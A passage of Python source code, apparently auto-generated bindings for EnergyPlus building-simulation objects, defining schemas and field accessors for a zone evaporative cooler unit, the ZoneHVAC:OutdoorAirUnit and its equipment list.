"""field `Cooler Unit Control Method`
Args:
value (str): value for IDD Field `Cooler Unit Control Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooler_unit_control_method` or None if not set
"""
return self["Cooler Unit Control Method"]
@cooler_unit_control_method.setter
def cooler_unit_control_method(self, value=None):
"""Corresponds to IDD field `Cooler Unit Control Method`"""
self["Cooler Unit Control Method"] = value
@property
def throttling_range_temperature_difference(self):
"""field `Throttling Range Temperature Difference`
| used for ZoneTemperatureDeadbandOnOffCycling hystersis range for thermostatic control
| Units: deltaC
| Default value: 1.0
Args:
value (float): value for IDD Field `Throttling Range Temperature Difference`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `throttling_range_temperature_difference` or None if not set
"""
return self["Throttling Range Temperature Difference"]
@throttling_range_temperature_difference.setter
def throttling_range_temperature_difference(self, value=1.0):
"""Corresponds to IDD field `Throttling Range Temperature
Difference`"""
self["Throttling Range Temperature Difference"] = value
@property
def cooling_load_control_threshold_heat_transfer_rate(self):
"""field `Cooling Load Control Threshold Heat Transfer Rate`
| Sign convention is that positive values indicate a cooling load
| Units: W
| Default value: 100.0
Args:
value (float): value for IDD Field `Cooling Load Control Threshold Heat Transfer Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_load_control_threshold_heat_transfer_rate` or None if not set
"""
return self["Cooling Load Control Threshold Heat Transfer Rate"]
@cooling_load_control_threshold_heat_transfer_rate.setter
def cooling_load_control_threshold_heat_transfer_rate(self, value=100.0):
"""Corresponds to IDD field `Cooling Load Control Threshold Heat
Transfer Rate`"""
self["Cooling Load Control Threshold Heat Transfer Rate"] = value
@property
def first_evaporative_cooler_object_type(self):
"""field `First Evaporative Cooler Object Type`
Args:
value (str): value for IDD Field `First Evaporative Cooler Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `first_evaporative_cooler_object_type` or None if not set
"""
return self["First Evaporative Cooler Object Type"]
@first_evaporative_cooler_object_type.setter
def first_evaporative_cooler_object_type(self, value=None):
"""Corresponds to IDD field `First Evaporative Cooler Object Type`"""
self["First Evaporative Cooler Object Type"] = value
@property
def first_evaporative_cooler_object_name(self):
"""field `First Evaporative Cooler Object Name`
Args:
value (str): value for IDD Field `First Evaporative Cooler Object Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `first_evaporative_cooler_object_name` or None if not set
"""
return self["First Evaporative Cooler Object Name"]
@first_evaporative_cooler_object_name.setter
def first_evaporative_cooler_object_name(self, value=None):
"""Corresponds to IDD field `First Evaporative Cooler Object Name`"""
self["First Evaporative Cooler Object Name"] = value
@property
def second_evaporative_cooler_object_type(self):
"""field `Second Evaporative Cooler Object Type`
| optional, used for direct/indirect configurations
| second cooler must be immediately downstream of first cooler, if present
Args:
value (str): value for IDD Field `Second Evaporative Cooler Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `second_evaporative_cooler_object_type` or None if not set
"""
return self["Second Evaporative Cooler Object Type"]
@second_evaporative_cooler_object_type.setter
def second_evaporative_cooler_object_type(self, value=None):
"""Corresponds to IDD field `Second Evaporative Cooler Object Type`"""
self["Second Evaporative Cooler Object Type"] = value
@property
def second_evaporative_cooler_name(self):
"""field `Second Evaporative Cooler Name`
| optional, used for direct/indirect configurations
Args:
value (str): value for IDD Field `Second Evaporative Cooler Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `second_evaporative_cooler_name` or None if not set
"""
return self["Second Evaporative Cooler Name"]
@second_evaporative_cooler_name.setter
def second_evaporative_cooler_name(self, value=None):
"""Corresponds to IDD field `Second Evaporative Cooler Name`"""
self["Second Evaporative Cooler Name"] = value
@property
def design_specification_zonehvac_sizing_object_name(self):
"""field `Design Specification ZoneHVAC Sizing Object Name`
| Enter the name of a DesignSpecificationZoneHVACSizing object.
Args:
value (str): value for IDD Field `Design Specification ZoneHVAC Sizing Object Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `design_specification_zonehvac_sizing_object_name` or None if not set
"""
return self["Design Specification ZoneHVAC Sizing Object Name"]
@design_specification_zonehvac_sizing_object_name.setter
def design_specification_zonehvac_sizing_object_name(self, value=None):
"""Corresponds to IDD field `Design Specification ZoneHVAC Sizing
Object Name`"""
self["Design Specification ZoneHVAC Sizing Object Name"] = value
class ZoneHvacOutdoorAirUnit(DataObject):
    """ Corresponds to IDD object `ZoneHVAC:OutdoorAirUnit`
        The zone outdoor air unit models a single-zone dedicated outdoor air system (DOAS).
        Forced-convection 100% outdoor air unit with supply fan and optional equipment
        including exhaust fan, heating coil, cooling coil, and heat recovery.
    """
    # IDD-derived metadata for this object's fields: declaration order, types,
    # defaults, accepted values, and required/autosizable flags.
    # NOTE(review): presumably consumed by the DataObject base class (via the
    # self[...] item protocol below) for validation and IDF serialization --
    # confirm in the base class.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'availability schedule name',
                                       {'name': u'Availability Schedule Name',
                                        'pyname': u'availability_schedule_name',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'zone name',
                                       {'name': u'Zone Name',
                                        'pyname': u'zone_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'outdoor air flow rate',
                                       {'name': u'Outdoor Air Flow Rate',
                                        'pyname': u'outdoor_air_flow_rate',
                                        'minimum>': 0.0,
                                        'required-field': True,
                                        'autosizable': True,
                                        'autocalculatable': False,
                                        'type': 'real',
                                        'unit': u'm3/s'}),
                                      (u'outdoor air schedule name',
                                       {'name': u'Outdoor Air Schedule Name',
                                        'pyname': u'outdoor_air_schedule_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'supply fan name',
                                       {'name': u'Supply Fan Name',
                                        'pyname': u'supply_fan_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'supply fan placement',
                                       {'name': u'Supply Fan Placement',
                                        'pyname': u'supply_fan_placement',
                                        'default': u'DrawThrough',
                                        'required-field': True,
                                        'autosizable': False,
                                        'accepted-values': [u'BlowThrough',
                                                            u'DrawThrough'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'exhaust fan name',
                                       {'name': u'Exhaust Fan Name',
                                        'pyname': u'exhaust_fan_name',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'exhaust air flow rate',
                                       {'name': u'Exhaust Air Flow Rate',
                                        'pyname': u'exhaust_air_flow_rate',
                                        'required-field': False,
                                        'autosizable': True,
                                        'autocalculatable': False,
                                        'type': 'real',
                                        'unit': u'm3/s'}),
                                      (u'exhaust air schedule name',
                                       {'name': u'Exhaust Air Schedule Name',
                                        'pyname': u'exhaust_air_schedule_name',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'unit control type',
                                       {'name': u'Unit Control Type',
                                        'pyname': u'unit_control_type',
                                        'default': u'NeutralControl',
                                        'required-field': True,
                                        'autosizable': False,
                                        'accepted-values': [u'NeutralControl',
                                                            u'TemperatureControl'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'high air control temperature schedule name',
                                       {'name': u'High Air Control Temperature Schedule Name',
                                        'pyname': u'high_air_control_temperature_schedule_name',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'low air control temperature schedule name',
                                       {'name': u'Low Air Control Temperature Schedule Name',
                                        'pyname': u'low_air_control_temperature_schedule_name',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'outdoor air node name',
                                       {'name': u'Outdoor Air Node Name',
                                        'pyname': u'outdoor_air_node_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'node'}),
                                      (u'airoutlet node name',
                                       {'name': u'AirOutlet Node Name',
                                        'pyname': u'airoutlet_node_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'node'}),
                                      (u'airinlet node name',
                                       {'name': u'AirInlet Node Name',
                                        'pyname': u'airinlet_node_name',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'node'}),
                                      (u'supply fanoutlet node name',
                                       {'name': u'Supply FanOutlet Node Name',
                                        'pyname': u'supply_fanoutlet_node_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'node'}),
                                      (u'outdoor air unit list name',
                                       {'name': u'Outdoor Air Unit List Name',
                                        'pyname': u'outdoor_air_unit_list_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'availability manager list name',
                                       {'name': u'Availability Manager List Name',
                                        'pyname': u'availability_manager_list_name',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'})]),
               'format': None,
               'group': u'Zone HVAC Forced Air Units',
               'min-fields': 18,
               'name': u'ZoneHVAC:OutdoorAirUnit',
               'pyname': u'ZoneHvacOutdoorAirUnit',
               'required-object': False,
               'unique-object': False}
    # --- Field accessors -------------------------------------------------
    # One property per IDD field; each simply reads/writes the field by its
    # display name through the DataObject item protocol.
    @property
    def name(self):
        """field `Name`
        Args:
            value (str): value for IDD Field `Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `name` or None if not set
        """
        return self["Name"]
    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value
    @property
    def availability_schedule_name(self):
        """field `Availability Schedule Name`
        | Availability schedule name for this system. Schedule value > 0 means the system is available.
        | If this field is blank, the system is always available.
        Args:
            value (str): value for IDD Field `Availability Schedule Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `availability_schedule_name` or None if not set
        """
        return self["Availability Schedule Name"]
    @availability_schedule_name.setter
    def availability_schedule_name(self, value=None):
        """Corresponds to IDD field `Availability Schedule Name`"""
        self["Availability Schedule Name"] = value
    @property
    def zone_name(self):
        """field `Zone Name`
        | (name of zone system is serving)
        Args:
            value (str): value for IDD Field `Zone Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `zone_name` or None if not set
        """
        return self["Zone Name"]
    @zone_name.setter
    def zone_name(self, value=None):
        """Corresponds to IDD field `Zone Name`"""
        self["Zone Name"] = value
    @property
    def outdoor_air_flow_rate(self):
        """field `Outdoor Air Flow Rate`
        | Units: m3/s
        Args:
            value (float or "Autosize"): value for IDD Field `Outdoor Air Flow Rate`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float or "Autosize": the value of `outdoor_air_flow_rate` or None if not set
        """
        return self["Outdoor Air Flow Rate"]
    @outdoor_air_flow_rate.setter
    def outdoor_air_flow_rate(self, value=None):
        """Corresponds to IDD field `Outdoor Air Flow Rate`"""
        self["Outdoor Air Flow Rate"] = value
    @property
    def outdoor_air_schedule_name(self):
        """field `Outdoor Air Schedule Name`
        Args:
            value (str): value for IDD Field `Outdoor Air Schedule Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `outdoor_air_schedule_name` or None if not set
        """
        return self["Outdoor Air Schedule Name"]
    @outdoor_air_schedule_name.setter
    def outdoor_air_schedule_name(self, value=None):
        """Corresponds to IDD field `Outdoor Air Schedule Name`"""
        self["Outdoor Air Schedule Name"] = value
    @property
    def supply_fan_name(self):
        """field `Supply Fan Name`
        | Allowable fan types are Fan:ConstantVolume and
        | Fan:VariableVolume
        Args:
            value (str): value for IDD Field `Supply Fan Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `supply_fan_name` or None if not set
        """
        return self["Supply Fan Name"]
    @supply_fan_name.setter
    def supply_fan_name(self, value=None):
        """Corresponds to IDD field `Supply Fan Name`"""
        self["Supply Fan Name"] = value
    @property
    def supply_fan_placement(self):
        """field `Supply Fan Placement`
        | Default value: DrawThrough
        Args:
            value (str): value for IDD Field `Supply Fan Placement`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `supply_fan_placement` or None if not set
        """
        return self["Supply Fan Placement"]
    @supply_fan_placement.setter
    def supply_fan_placement(self, value="DrawThrough"):
        """Corresponds to IDD field `Supply Fan Placement`"""
        self["Supply Fan Placement"] = value
    @property
    def exhaust_fan_name(self):
        """field `Exhaust Fan Name`
        | Allowable fan types are Fan:ConstantVolume and
        | Fan:VariableVolume
        Args:
            value (str): value for IDD Field `Exhaust Fan Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `exhaust_fan_name` or None if not set
        """
        return self["Exhaust Fan Name"]
    @exhaust_fan_name.setter
    def exhaust_fan_name(self, value=None):
        """Corresponds to IDD field `Exhaust Fan Name`"""
        self["Exhaust Fan Name"] = value
    @property
    def exhaust_air_flow_rate(self):
        """field `Exhaust Air Flow Rate`
        | Units: m3/s
        Args:
            value (float or "Autosize"): value for IDD Field `Exhaust Air Flow Rate`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float or "Autosize": the value of `exhaust_air_flow_rate` or None if not set
        """
        return self["Exhaust Air Flow Rate"]
    @exhaust_air_flow_rate.setter
    def exhaust_air_flow_rate(self, value=None):
        """Corresponds to IDD field `Exhaust Air Flow Rate`"""
        self["Exhaust Air Flow Rate"] = value
    @property
    def exhaust_air_schedule_name(self):
        """field `Exhaust Air Schedule Name`
        Args:
            value (str): value for IDD Field `Exhaust Air Schedule Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `exhaust_air_schedule_name` or None if not set
        """
        return self["Exhaust Air Schedule Name"]
    @exhaust_air_schedule_name.setter
    def exhaust_air_schedule_name(self, value=None):
        """Corresponds to IDD field `Exhaust Air Schedule Name`"""
        self["Exhaust Air Schedule Name"] = value
    @property
    def unit_control_type(self):
        """field `Unit Control Type`
        | Default value: NeutralControl
        Args:
            value (str): value for IDD Field `Unit Control Type`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `unit_control_type` or None if not set
        """
        return self["Unit Control Type"]
    @unit_control_type.setter
    def unit_control_type(self, value="NeutralControl"):
        """Corresponds to IDD field `Unit Control Type`"""
        self["Unit Control Type"] = value
    @property
    def high_air_control_temperature_schedule_name(self):
        """field `High Air Control Temperature Schedule Name`
        | Air and control temperatures for cooling. If outdoor air temperature
        | is above the high air control temperature, then the zone inlet air temperature
        | is set to the high air control temperature. If the outdoor air is between high and low
        | air control temperature, then there is no cooling/heating requirements.
        Args:
            value (str): value for IDD Field `High Air Control Temperature Schedule Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `high_air_control_temperature_schedule_name` or None if not set
        """
        return self["High Air Control Temperature Schedule Name"]
    @high_air_control_temperature_schedule_name.setter
    def high_air_control_temperature_schedule_name(self, value=None):
        """Corresponds to IDD field `High Air Control Temperature Schedule
        Name`"""
        self["High Air Control Temperature Schedule Name"] = value
    @property
    def low_air_control_temperature_schedule_name(self):
        """field `Low Air Control Temperature Schedule Name`
        | Air and control temperatures for Heating. If outdoor air temperature
        | is below the low air control temperature, then the zone inlet air temperature
        | is set to the low air control temperature. If the outdoor air is between high and low
        | air control temperature, then there is no cooling/heating requirements.
        Args:
            value (str): value for IDD Field `Low Air Control Temperature Schedule Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `low_air_control_temperature_schedule_name` or None if not set
        """
        return self["Low Air Control Temperature Schedule Name"]
    @low_air_control_temperature_schedule_name.setter
    def low_air_control_temperature_schedule_name(self, value=None):
        """Corresponds to IDD field `Low Air Control Temperature Schedule
        Name`"""
        self["Low Air Control Temperature Schedule Name"] = value
    @property
    def outdoor_air_node_name(self):
        """field `Outdoor Air Node Name`
        Args:
            value (str): value for IDD Field `Outdoor Air Node Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `outdoor_air_node_name` or None if not set
        """
        return self["Outdoor Air Node Name"]
    @outdoor_air_node_name.setter
    def outdoor_air_node_name(self, value=None):
        """Corresponds to IDD field `Outdoor Air Node Name`"""
        self["Outdoor Air Node Name"] = value
    @property
    def airoutlet_node_name(self):
        """field `AirOutlet Node Name`
        Args:
            value (str): value for IDD Field `AirOutlet Node Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `airoutlet_node_name` or None if not set
        """
        return self["AirOutlet Node Name"]
    @airoutlet_node_name.setter
    def airoutlet_node_name(self, value=None):
        """Corresponds to IDD field `AirOutlet Node Name`"""
        self["AirOutlet Node Name"] = value
    @property
    def airinlet_node_name(self):
        """field `AirInlet Node Name`
        | air leaves zone
        Args:
            value (str): value for IDD Field `AirInlet Node Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `airinlet_node_name` or None if not set
        """
        return self["AirInlet Node Name"]
    @airinlet_node_name.setter
    def airinlet_node_name(self, value=None):
        """Corresponds to IDD field `AirInlet Node Name`"""
        self["AirInlet Node Name"] = value
    @property
    def supply_fanoutlet_node_name(self):
        """field `Supply FanOutlet Node Name`
        Args:
            value (str): value for IDD Field `Supply FanOutlet Node Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `supply_fanoutlet_node_name` or None if not set
        """
        return self["Supply FanOutlet Node Name"]
    @supply_fanoutlet_node_name.setter
    def supply_fanoutlet_node_name(self, value=None):
        """Corresponds to IDD field `Supply FanOutlet Node Name`"""
        self["Supply FanOutlet Node Name"] = value
    @property
    def outdoor_air_unit_list_name(self):
        """field `Outdoor Air Unit List Name`
        | Enter the name of an ZoneHVAC:OutdoorAirUnit:EquipmentList object.
        Args:
            value (str): value for IDD Field `Outdoor Air Unit List Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `outdoor_air_unit_list_name` or None if not set
        """
        return self["Outdoor Air Unit List Name"]
    @outdoor_air_unit_list_name.setter
    def outdoor_air_unit_list_name(self, value=None):
        """Corresponds to IDD field `Outdoor Air Unit List Name`"""
        self["Outdoor Air Unit List Name"] = value
    @property
    def availability_manager_list_name(self):
        """field `Availability Manager List Name`
        | Enter the name of an AvailabilityManagerAssignmentList object.
        Args:
            value (str): value for IDD Field `Availability Manager List Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `availability_manager_list_name` or None if not set
        """
        return self["Availability Manager List Name"]
    @availability_manager_list_name.setter
    def availability_manager_list_name(self, value=None):
        """Corresponds to IDD field `Availability Manager List Name`"""
        self["Availability Manager List Name"] = value
class ZoneHvacOutdoorAirUnitEquipmentList(DataObject):
""" Corresponds to IDD object `ZoneHVAC:OutdoorAirUnit:EquipmentList`
Equipment list for components in a ZoneHVAC:OutdoorAirUnit. Components are simulated
sequentially in the order given in the equipment list.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'component 1 object type',
{'name': u'Component 1 Object Type',
'pyname': u'component_1_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Electric',
u'Coil:Heating:Gas',
u'Coil:Heating:Steam',
u'Coil:Heating:Water',
u'Coil:Cooling:Water',
u'Coil:Cooling:Water:DetailedGeometry',
u'CoilSystem:Cooling:Water:HeatexchangerAssisted',
u'CoilSystem:Cooling:DX',
u'CoilSystem:Heating:DX',
u'HeatExchanger:AirToAir:FlatPlate',
u'HeatExchanger:AirToAir:SensibleAndLatent',
u'Dehumidifier:Desiccant:NoFans'],
'autocalculatable': False,
'type': 'alpha'}),
(u'component 1 name',
{'name': u'Component 1 Name',
'pyname': u'component_1_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'component 2 object type',
{'name': u'Component 2 Object Type',
'pyname': u'component_2_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Electric',
u'Coil:Heating:Gas',
u'Coil:Heating:Steam',
u'Coil:Heating:Water',
u'Coil:Cooling:Water',
u'Coil:Cooling:Water:DetailedGeometry',
u'CoilSystem:Cooling:Water:HeatexchangerAssisted',
u'CoilSystem:Cooling:DX',
u'CoilSystem:Heating:DX',
u'HeatExchanger:AirToAir:FlatPlate',
u'HeatExchanger:AirToAir:SensibleAndLatent',
u'Dehumidifier:Desiccant:NoFans'],
'autocalculatable': False,
'type': 'alpha'}),
(u'component 2 name',
{'name': u'Component 2 Name',
'pyname': u'component_2_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'component 3 object type',
{'name': u'Component 3 Object Type',
'pyname': u'component_3_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Electric',
u'Coil:Heating:Gas',
u'Coil:Heating:Steam',
u'Coil:Heating:Water',
u'Coil:Cooling:Water',
u'Coil:Cooling:Water:DetailedGeometry',
u'CoilSystem:Cooling:Water:HeatexchangerAssisted',
u'CoilSystem:Cooling:DX',
u'CoilSystem:Heating:DX',
u'HeatExchanger:AirToAir:FlatPlate',
u'HeatExchanger:AirToAir:SensibleAndLatent',
u'Dehumidifier:Desiccant:NoFans'],
'autocalculatable': False,
'type': 'alpha'}),
(u'component 3 name',
{'name': u'Component 3 Name',
'pyname': u'component_3_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'component 4 object type',
{'name': u'Component 4 Object Type',
'pyname': u'component_4_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Electric',
u'Coil:Heating:Gas',
u'Coil:Heating:Steam',
u'Coil:Heating:Water',
u'Coil:Cooling:Water',
u'Coil:Cooling:Water:DetailedGeometry',
u'CoilSystem:Cooling:Water:HeatexchangerAssisted',
u'CoilSystem:Cooling:DX',
u'CoilSystem:Heating:DX',
u'HeatExchanger:AirToAir:FlatPlate',
u'HeatExchanger:AirToAir:SensibleAndLatent',
u'Dehumidifier:Desiccant:NoFans'],
'autocalculatable': False,
'type': 'alpha'}),
(u'component 4 name',
{'name': u'Component 4 Name',
'pyname': u'component_4_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'component 5 object type',
{'name': u'Component 5 Object Type',
'pyname': u'component_5_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Electric',
u'Coil:Heating:Gas',
u'Coil:Heating:Steam',
u'Coil:Heating:Water',
u'Coil:Cooling:Water',
u'Coil:Cooling:Water:DetailedGeometry',
u'CoilSystem:Cooling:Water:HeatexchangerAssisted',
u'CoilSystem:Cooling:DX',
u'CoilSystem:Heating:DX',
u'HeatExchanger:AirToAir:FlatPlate',
u'HeatExchanger:AirToAir:SensibleAndLatent',
u'Dehumidifier:Desiccant:NoFans'],
'autocalculatable': False,
'type': 'alpha'}),
(u'component 5 name',
{'name': u'Component 5 Name',
'pyname': u'component_5_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'component 6 object type',
{'name': u'Component 6 Object Type',
'pyname': u'component_6_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Electric',
u'Coil:Heating:Gas',
u'Coil:Heating:Steam',
u'Coil:Heating:Water',
u'Coil:Cooling:Water',
u'Coil:Cooling:Water:DetailedGeometry',
u'CoilSystem:Cooling:Water:HeatexchangerAssisted',
u'CoilSystem:Cooling:DX',
u'CoilSystem:Heating:DX',
u'HeatExchanger:AirToAir:FlatPlate',
u'HeatExchanger:AirToAir:SensibleAndLatent',
u'Dehumidifier:Desiccant:NoFans'],
'autocalculatable': False,
'type': 'alpha'}),
(u'component 6 name',
{'name': u'Component 6 Name',
'pyname': u'component_6_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'component 7 object type',
{'name': u'Component 7 Object Type',
'pyname': u'component_7_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Electric',
u'Coil:Heating:Gas',
u'Coil:Heating:Steam',
u'Coil:Heating:Water',
u'Coil:Cooling:Water',
u'Coil:Cooling:Water:DetailedGeometry',
u'CoilSystem:Cooling:Water:HeatexchangerAssisted',
u'CoilSystem:Cooling:DX',
u'CoilSystem:Heating:DX',
u'HeatExchanger:AirToAir:FlatPlate',
u'HeatExchanger:AirToAir:SensibleAndLatent',
u'Dehumidifier:Desiccant:NoFans'],
'autocalculatable': False,
'type': 'alpha'}),
(u'component 7 name',
{'name': u'Component 7 Name',
'pyname': u'component_7_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'component 8 object type',
{'name': u'Component 8 Object Type',
'pyname': u'component_8_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Electric',
u'Coil:Heating:Gas',
u'Coil:Heating:Steam',
u'Coil:Heating:Water',
u'Coil:Cooling:Water',
u'Coil:Cooling:Water:DetailedGeometry',
u'CoilSystem:Cooling:Water:HeatexchangerAssisted',
u'CoilSystem:Cooling:DX',
u'CoilSystem:Heating:DX',
u'HeatExchanger:AirToAir:FlatPlate',
u'HeatExchanger:AirToAir:SensibleAndLatent',
u'Dehumidifier:Desiccant:NoFans'],
'autocalculatable': False,
'type': 'alpha'}),
(u'component 8 name',
{'name': u'Component 8 Name',
'pyname': u'component_8_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'})]),
'format': None,
'group': u'Zone HVAC Forced Air Units',
'min-fields': 0,
'name': u'ZoneHVAC:OutdoorAirUnit:EquipmentList',
'pyname': u'ZoneHvacOutdoorAirUnitEquipmentList',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def component_1_object_type(self):
"""field `Component 1 Object Type`
Args:
value (str): value for IDD Field `Component 1 Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_1_object_type` or None if not set
"""
return self["Component 1 Object Type"]
@component_1_object_type.setter
def component_1_object_type(self, value=None):
"""Corresponds to IDD field `Component 1 Object Type`"""
self["Component 1 Object Type"] = value
@property
def component_1_name(self):
"""field `Component 1 Name`
Args:
value (str): value for IDD Field `Component 1 Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_1_name` or None if not set
"""
return self["Component 1 Name"]
@component_1_name.setter
def component_1_name(self, value=None):
"""Corresponds to IDD field `Component 1 Name`"""
self["Component 1 Name"] = value
@property
def component_2_object_type(self):
"""field `Component 2 Object Type`
Args:
value (str): value for IDD Field `Component 2 Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_2_object_type` or None if not set
"""
return self["Component 2 Object Type"]
@component_2_object_type.setter
def component_2_object_type(self, value=None):
"""Corresponds to IDD field `Component 2 Object Type`"""
self["Component 2 Object Type"] = value
@property
def component_2_name(self):
"""field `Component 2 Name`
Args:
value (str): value for IDD Field `Component 2 Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_2_name` or None if not set
"""
return self["Component 2 Name"]
@component_2_name.setter
def component_2_name(self, value=None):
"""Corresponds to IDD field `Component 2 Name`"""
self["Component 2 Name"] = value
@property
def component_3_object_type(self):
"""field `Component 3 Object Type`
Args:
value (str): value for IDD Field `Component 3 Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_3_object_type` or None if not set
"""
return self["Component 3 Object Type"]
@component_3_object_type.setter
def component_3_object_type(self, value=None):
"""Corresponds to IDD field `Component 3 Object Type`"""
self["Component 3 Object Type"] = value
@property
def component_3_name(self):
"""field `Component 3 Name`
Args:
value (str): value for IDD Field `Component 3 Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_3_name` or None if not set
"""
return self["Component 3 Name"]
@component_3_name.setter
def component_3_name(self, value=None):
"""Corresponds to IDD field `Component 3 Name`"""
self["Component 3 Name"] = value
@property
def component_4_object_type(self):
"""field `Component 4 Object Type`
Args:
value (str): value for IDD Field `Component 4 Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_4_object_type` or None if not set
"""
return self["Component 4 Object Type"]
@component_4_object_type.setter
def component_4_object_type(self, value=None):
"""Corresponds to IDD field `Component 4 Object Type`"""
self["Component 4 Object Type"] = value
@property
def component_4_name(self):
"""field `Component 4 Name`
Args:
value (str): value for IDD Field `Component 4 Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_4_name` or None if not set
"""
return self["Component 4 Name"]
@component_4_name.setter
def component_4_name(self, value=None):
"""Corresponds to IDD field `Component 4 Name`"""
self["Component 4 Name"] = value
@property
def component_5_object_type(self):
"""field `Component 5 Object Type`
Args:
value (str): value for IDD Field `Component 5 Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_5_object_type` or None if not set
"""
return self["Component 5 Object Type"]
@component_5_object_type.setter
def component_5_object_type(self, value=None):
"""Corresponds to IDD field `Component 5 Object Type`"""
self["Component 5 Object Type"] = value
@property
def component_5_name(self):
"""field `Component 5 Name`
Args:
value (str): value for IDD Field `Component 5 Name`
